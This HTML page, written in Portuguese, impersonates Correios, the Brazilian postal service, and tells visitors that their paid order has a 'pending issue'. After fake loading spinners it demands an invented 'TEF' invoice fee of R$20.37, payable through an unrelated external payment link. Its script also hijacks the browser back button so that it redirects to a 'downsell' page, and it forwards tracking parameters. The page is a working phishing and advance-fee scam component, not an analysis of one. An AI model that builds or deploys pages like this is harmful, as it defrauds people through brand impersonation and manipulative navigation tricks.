<!DOCTYPE html>
<html lang="pt">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
    <title>Correios</title>
    <link rel="stylesheet" href="css/products.css">
    <link rel="stylesheet" href="css/styles.css">
    <link rel="stylesheet" href="css/fonts.css">
    <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Material+Symbols+Outlined:opsz,wght,FILL,GRAD@24,400,0,0">
</head>
<body>
    <nav class="navbar" style="padding-top: 15px;">
        <div class="menu-icon" style="padding-left: 3%;">
            <img src="https://seeklogo.com/images/C/correios-2020-logo-D733E75ED9-seeklogo.com.png" style="width: 90px !important; height: 6vh;" alt="Logo Central Vivara">
        </div>
        <div class="logo-central">
        </div>
        <div class="menu-icon" style="padding-right: 3%;">
            <span class="material-symbols-outlined" style="margin-left: 0%; font-size: 30px; padding-right: 10px; color: black">shopping_cart</span>
        </div>
    </nav>

    <div id="ad1">
        <p style="margin-left: 5%; font-family: 'GellixMedium'; font-size: 22px;">Seus pedidos</p>
        <div class="ad1">
            <div style="margin-left: 3%; margin-right: 3%;">
                <button class="styled-button">
                    <div class="icon-container">
                        <span class="material-symbols-outlined">local_shipping</span>
                    </div>
                    <span class="button-text">
                        <span class="button-title">#6481749338</span>
                    </span>
                </button>

                <div class="entrega-container">
                    <div class="entrega-header">
                        Status
                    </div>
                    <div class="entrega-content">
                        <div class="icon-container2">
                            <span class="material-symbols-outlined">check</span>
                        </div>
                        <div class="text-container">
                            <div class="entrega-title">Pagamento concluído</div>
                        </div>
                    </div>
                    <div class="entrega-content">
                        <div class="icon-container3">
                            <span class="material-symbols-outlined">warning</span>
                        </div>
                        <div class="text-container">
                            <div class="entrega-title">Pedido pendente</div>
                        </div>
                    </div>
                </div>

                <p style="text-align: center; margin-left: 3%; margin-right: 3%;">Seu pagamento foi concluído com sucesso, mas há uma pendência em seu pedido. Clique abaixo para resolver este problema!</p>

                <div class="button-container" style="padding-bottom: 20px;">
                    <button class="styled-button2" onclick="showAd2()">
                        <span class="button-text">
                            <span class="button-title2">Resolver problema</span>
                        </span>
                        <span class="material-symbols-outlined" style="font-size: 32px;">arrow_forward_ios</span>
                    </button>
                </div>
            </div>
        </div>
    </div>

    <div id="ad2" style="display: none;">
        <p style="margin-left: 5%; font-family: 'GellixMedium'; font-size: 22px;">Problemas no pedido</p>
        <div class="ad2" style="padding-top: 15px; padding-bottom: 15px;">
            <div style="padding-top: 2px;"></div>
            <div id="loadingGif" class="loading">
                <div class="spinner"></div>
            </div>

            <div class="entrega-container hidden" id="text1">
                <div class="entrega-content">
                    <div class="icon-container2">
                        <span class="material-symbols-outlined">settings</span>
                    </div>
                    <div class="text-container">
                        <div class="entrega-title">Estamos identificando o problema em seu pedido!</div>
                    </div>
                </div>
            </div>

            <div id="loadingGif2" class="loading hidden">
                <div class="spinner"></div>
            </div>

            <div id="text2" class="hidden entrega-container" style="margin-top: 15px;">
                <div class="entrega-content">
                    <div class="icon-container2" style="background-color: red;">
                        <span class="material-symbols-outlined">warning</span>
                    </div>
                    <div class="text-container">
                        <div class="entrega-title">Identificamos que há uma pendência no seu pedido!</div>
                    </div>
                </div>
            </div>

            <div id="loadingGif3" class="loading hidden" style="padding-top: 20px;">
                <div class="spinner"></div>
            </div>

            <div id="text3" class="hidden entrega-container" style="background-color: #d40303; margin-top: 15px;">
                <div class="entrega-content">
                    <div class="icon-container2" style="background-color: rgb(255, 255, 255);">
                        <span class="material-symbols-outlined" style="color: #d40303;">priority_high</span>
                    </div>
                    <div class="text-container">
                        <div class="entrega-title" style="color: white">É necessário realizar o pagamento da TEF (Taxa de Emissão de Fatura) para emitir a fatura do seu produto e prosseguir com o despacho. O valor único é de R$20,37</div>
                    </div>
                </div>
            </div>

            <script>
                function openNewWindowWithUTMs(url) {
                    const currentUrlParams = new URLSearchParams(window.location.search);
                    let utms = '';

                    for (let [key, value] of currentUrlParams.entries()) {
                        if (key.startsWith('')) {
                            utms += `${key}=${value}&`;
                        }
                    }

                    if (utms) {
                        utms = utms.slice(0, -1);
                    }

                    const fullUrl = url + (utms ? '?' + utms : '');
                    window.open(fullUrl, '_blank');
                }
            </script>

            <div id="finalButton" class="button-container hidden" style="padding-top: 15px;">
                <button class="styled-button2" onclick="openNewWindowWithUTMs('https://pay.retireagora.online/PyE2ZyL2Ex03qRb')">
                    <span class="button-text">
                        <span class="button-title2">Pagar a TEF</span>
                    </span>
                    <span class="material-symbols-outlined" style="font-size: 32px;">arrow_forward_ios</span>
                </button>
            </div>

            <div style="padding-bottom: 2px;"></div>
        </div>
    </div>

    <script src="js/scripts.js"></script>
    <script>
        var urlBackRedirect = '../downsell-tenf/';
        urlBackRedirect = urlBackRedirect.trim() + (urlBackRedirect.indexOf("?") > 0 ? '&' : '?') + document.location.search.replace('?', '').toString();
        history.pushState({}, "", location.href);
        history.pushState({}, "", location.href);
        window.onpopstate = function () {
            setTimeout(function () {
                location.href = urlBackRedirect + window.location.search;
            }, 1);
        };
    </script>

    <script>
        'undefined' === typeof _trfq || (window._trfq = []);
        'undefined' === typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'},{'ap':'cpsh-oh'},{'server':'p3plzcpnl492182'},{'dcenter':'p3'},{'cp_id':'9883949'},{'cp_cl':'8'})
    </script>
    <script src="js/scc-c2.min.js"></script>
</body>
</html>
